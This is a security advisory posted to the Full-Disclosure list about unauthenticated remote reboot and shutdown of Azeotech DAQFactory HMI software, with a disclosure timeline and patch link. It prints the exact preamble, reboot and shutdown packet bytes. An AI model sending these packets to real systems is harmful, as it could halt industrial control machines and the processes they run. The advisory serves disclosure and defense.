[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] nSense-2011-004: Azeotech DAQFactory



      nSense Vulnerability Research Security Advisory NSENSE-2011-004
      ---------------------------------------------------------------

      Affected Vendor:    Azeotech
      Affected Product:   DAQFactory
      Platform:           Windows
      Impact:             Remote reboot/shutdown
      Vendor response:    Patch
      CVE:                None
      Credit:             Knud / nSense

      Technical details
      ---------------------------------------------------------------
      The default configuration allows network connections towards
      the HMI without authentication. This allows an attacker on the
      network to shut down the machine running the HMI software by
      sending a packet as outlined below:
      preamble:
      "\x01\x00\x09\x00CPassword\x00"
      reboot:
      "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
      shutdown:
      "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

      Timeline:
      20110412     Contacted ICS-CERT
      20110413     ICS-CERT acknowledges receipt of information
      20110413     ICS-CERT creates ticket,# ICS-VU-240775
      20110502     Vendor creates patch, releases advisory to customers
      20110625     ICS-CERT releases advisory
      20110727     Vendor responds, CVE assigned, patch 20110809

      Solution
      Install the latest version from the vendor:
      http://www.azeotech.com/downloads.php

      Links:
      http://www.nsense.fi                       http://www.nsense.dk



      $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
      $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
      $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
      $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
      $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                     D r i v e n   b y   t h e   c h a l l e n g e _

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/